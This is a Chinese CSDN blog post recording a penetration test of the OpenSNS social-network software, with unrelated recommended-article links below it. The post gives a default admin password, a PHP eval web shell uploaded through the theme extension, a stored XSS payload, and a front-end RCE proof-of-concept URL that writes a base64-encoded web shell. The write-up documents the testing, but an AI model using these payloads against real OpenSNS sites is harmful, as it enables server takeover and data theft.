Open sns网站测试结果

最新推荐文章于 2024-08-17 17:03:35 发布
最新推荐文章于 2024-08-17 17:03:35 发布
阅读量460 收藏 8
点赞数 9
文章标签: 网络安全 经验分享 笔记 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_59047731/article/details/135412641
版权

Open sns网站测试结果

1、信息收集

网站账号:admin 密码:123123

2、存在的漏洞

2.1 弱口令漏洞

抓包爆破

网站账号:admin 密码:123123

在这里插入图片描述

成功登陆

在这里插入图片描述

2.2 文件上传漏洞

上传点:后台主题扩展处

在这里插入图片描述

一语句话木马

<?php eval($_REQUEST[666]);?>

在这里插入图片描述

然后回到前台页面访问这个文件(这个目录可以用kali的目录扫描出来)

访问路径
http://xxx.com/Theme/你上传的文件名

在这里插入图片描述

连接蚁剑成功

在这里插入图片描述

2.3存储型xss漏洞

在友情链接处

在这里插入图片描述

编辑

"><script>alert(1)</script>

在这里插入图片描述

成功弹窗

在这里插入图片描述

在这里插入图片描述

2.4前台RCE漏洞

打开网站首页
在这里插入图片描述

输入poc

/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule->_validationFieldItem%26id[4]=function%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=phpinfo()

在这里插入图片描述

然后改变cmd命令
输入

file_put_contents("./aaa.php",base64_decode("PD9waHAgZXZhbCgkX1JFUVVFU1RbNjY2XSk7Pz4="))

去访问生成的aaa.php
在这里插入图片描述

连接蚁剑成功

在这里插入图片描述

落樱坠入星野
关注
  • 9
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
微信授权和测试整理
某的博客
02-05 6038
微信授权和测试整理第一次开发微信相关内容,做了两件事:微信授权获取用户基本;微信公众号消息和菜单的开发与测试。整理如下: -微信授权 -微信公众号消息 -微信公众号菜单 -微信公众号测试相关微信授权 微信授权有两种范围:一种是静默授权,微信用户无感知的情况下,你就能获取到用户的openid(用户的唯一标识);另一种是非静默授权,先回跳到授权页面,微信用户确认授权之后,可以拿到用户更多的基本
高通see架构ppg测试流程sns_client_test_cpp
小小
09-03 1865
一:浅析高通see架构测试流程。 sns_client_test_cpp 命令 vendor\qcom\proprietary\sensors-see\test\sns_client_example\src\sns_client_test.cpp 通过log 来分析流程比较容易一些: msm8937_32go:/ # sns_client_test_cpp pah813xselftest 7 starting sensors test for press ctrl-C to stop pah813xse
软件测试安全怎么做?
热门推荐
06-08 1万+
敏感数据:敏感数据的具体范围取决于产品具体的应用场景,产品应根据风险进行分析和判断。典型的敏感数据包括口令、银行帐号、大批量个人数据、用户通信内容和密钥等。个人数据:指直接通过该数据或者结合该数据与其他的信息,可以识别出自然人的信息。
微信测试号之基本功能
NameWFY的博客
12-18 2193
博客迁移:https://blog.frain.com.cn 一:网页授权登陆 第一步: 打开推荐文档:微信网页开发模块 微信网页授权 第二步post 请求: https://open.weixin.qq.com/connect/oauth2/authorize?appid=APPID&redirect_uri=REDIRECT_URI&respons...
校内网开放平台API (.net)
09-04
"开放平台"通常是指一个网站或服务向第三方开发者开放其一部分功能和数据,允许他们创建新的应用或工具;"Open API"是开放平台提供的一组接口,让开发者可以调用以访问平台资源;"SNS"即社交网络服务(Social ...
【Linux】Ubuntu18.04使用【python2】安装PIL、opencv、numpy、matplotlib、pandas、seaborn
12-21
import seaborn as sns # 如果没有报错,说明这些库都已成功安装 print("所有库已成功导入") ``` 以上步骤完成后,你就具备了在Python 2环境下进行图像处理和数据分析的基本工具。记得,随着Python 2的生命周期...
Python库 | moto-2.0.6.dev5.tar.gz
03-08
1. **模拟AWS服务**: `moto`能够模拟包括Amazon S3、EC2、DynamoDB、SQS、SNS、Lambda在内的多个AWS服务。这意味着开发者可以在本地环境中创建、查询、更新和删除这些服务的资源,就像在真实AWS环境中操作一样。 2....
python代码运行后画出图
05-14
如果代码中包含了Seaborn,可能会用到`sns.distplot()`(分布图)、`sns.heatmap()`(热力图)或者`sns.jointplot()`(联合分布图)等函数。 3. **Pandas库**:Pandas是Python数据分析的核心库,它的DataFrame对象...
浅析盛大开放平台.doc
08-14
开放平台的概念源于互联网时代,通过Open API,网站能够将其服务转化为可被第三方开发者使用的接口。Facebook开放平台的成功开启了这一趋势,随后Google的OpenSocial和其他类似平台的出现,推动了开放平台在全球...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8390
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
亿玛科技:TiDB 6.1.5 升级到 7.5.1 经验分享
TiDB 社区干货传送门
08-16 256
作者: foxchan 原文来源: https://tidb.net/blog/6e628afd ...
​【经验分享】微机原理、指令判断、判断指令是否正确判断指令是否正确​
VLOKL的博客
08-14 641
​【经验分享】微机原理、指令判断、判断指令是否正确判断指令是否正确​
普通话二甲备考经验分享
2401_86357738的博客
08-13 405
普通话二甲拿证备考经验分享
哈希原理(笔记)
最新发布
m0_62024160的博客
08-17 813
尤其应该注意Hash function的设计,它是一个难点,Hash funtion设计好坏直接关乎哈希表查询速度的快慢。考虑到哈希碰撞(涉及到对链表的操作),所以最坏的时间复杂度都是O(n)。早期的md5被破解也是因为人们搞清楚了它的加密方法 f(1) )大多利用单向散列函数函数。(简称为f(2) )计算查询哈希碰撞确认某个哈希值的存在,但是无法通过 f(2)逆推出明文(因为 f(2)只是验证方法,而非解密方法)。(本图来源:wiki)这个签名是由文件的散列值通过发布者的私钥加密生成的。
谷粒商城实战笔记-175~177-商城业务-检索服务-检索查询接口开发
epitomizelu的专栏
08-13 779
搜索页面搭建完成之后,点击搜索按钮,发送参数给后台服务,后台服务根据参数从Elasticsearch中查询符合条件的数据,返回给前端。
经验笔记:URI、URL、URN与URC之间的区别
qq_45831414的博客
08-14 597
URI是一种通用的标识符,可以指代任何类型的资源。URL是一种特定类型的URI,它不仅标识资源,还提供了访问该资源的方法。URN是一种用于唯一命名资源的特殊URI类型。URC是一个概念性的术语,用于描述如何构建或创建资源的过程。通过理解这些概念的区别,我们可以更加清晰地识别和使用互联网资源的标识方式。在日常工作中,我们最常遇到的是URL,因为它们是我们访问网页和其他在线资源的基础;而URN则在需要持久引用资源的情况下使用。
8月13日学习笔记 LVS
weixin_70751701的博客
08-13 1136
目标地址散列调度算法先根据请求的目标IP地址,作为散列键 (Hash Key)从静态分配的散列表找出对应的服务器,若该服务器 是可用的且未超载,将请求发送到该服务器,否则返回空。1. 配置两个网卡和两个ip地址,正常来说应该配置两个不同的网段的 ip,一个对外的vip,一个对内的dip,现在主要使用nat的网络模 式,可以配置桥接模式对外,Nat对内,教师机不方便配置桥接模 式,所以都是配置的nat模式,但是一定要分清楚哪个ip是vip,哪个 ip是dip,在物理主机上都要能够ping通。
C++_基本语法笔记_继承和多态
qq_45629864的博客
08-13 563
思想与Java差不多。
Open Mobile API 测试规范详解
"本文档详细阐述了Open Mobile API的测试规范,旨在确保安全、身份和移动性的实现。...此外,测试结果的分析和报告也是测试过程中的重要环节,有助于识别和修复潜在的问题,提高API的质量和稳定性。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值